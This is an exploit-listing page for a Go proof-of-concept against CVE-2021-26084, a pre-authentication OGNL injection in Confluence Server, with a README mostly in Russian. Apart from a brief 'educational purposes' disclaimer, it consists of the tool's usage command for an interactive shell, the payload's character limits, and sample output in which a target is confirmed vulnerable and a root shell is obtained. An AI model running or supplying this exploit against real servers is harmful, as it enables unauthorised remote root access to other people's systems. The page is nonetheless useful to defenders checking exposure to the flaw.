Sploitus

Exploit for CVE-2021-26084

kitploit · 2026-08-26

Exploit Code

MARKDOWN42 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TAYTHEBOT-CVE-2021-26084
# CVE-2021-26084

Доказательство концепции для CVE-2021-26084.

Confluence Server Webwork OGNL инъекция (Pre-Auth RCE)

## Disclaimer

Это только для образовательных целей. Я не несу ответственности за ваши действия. Используйте на свой страх и риск.

## Command Limitations

Из-за полезной нагрузки невозможно передать некоторые символы. Ниже приведён список того, что я обнаружил в ходе тестирования.

  * Двойные кавычки `"`
  * Вертикальная черта `|`



## Интерактивная оболочка

root@kitploit:~
    
    
     go run exploit.go -t <target> -i
    

Пример

root@kitploit:~
    
    
    root@localhost:/# go run exploit.go -t http://localhost:8090 -i
    CVE-2021-26084 - Confluence Server Webwork OGNL injection
    Made by Tay (https://github.com/taythebot)
    time="2021-09-02T00:29:37+09:00" level=info msg="Checking if https://localhost:8090 is vulnerable"
    time="2021-09-02T00:29:39+09:00" level=info msg="Target https://localhost:8090 is vulnerable"
    root@confluence:/# whoami
    root
    root@confluence:/# exit
    Exiting interactive mode, goodbye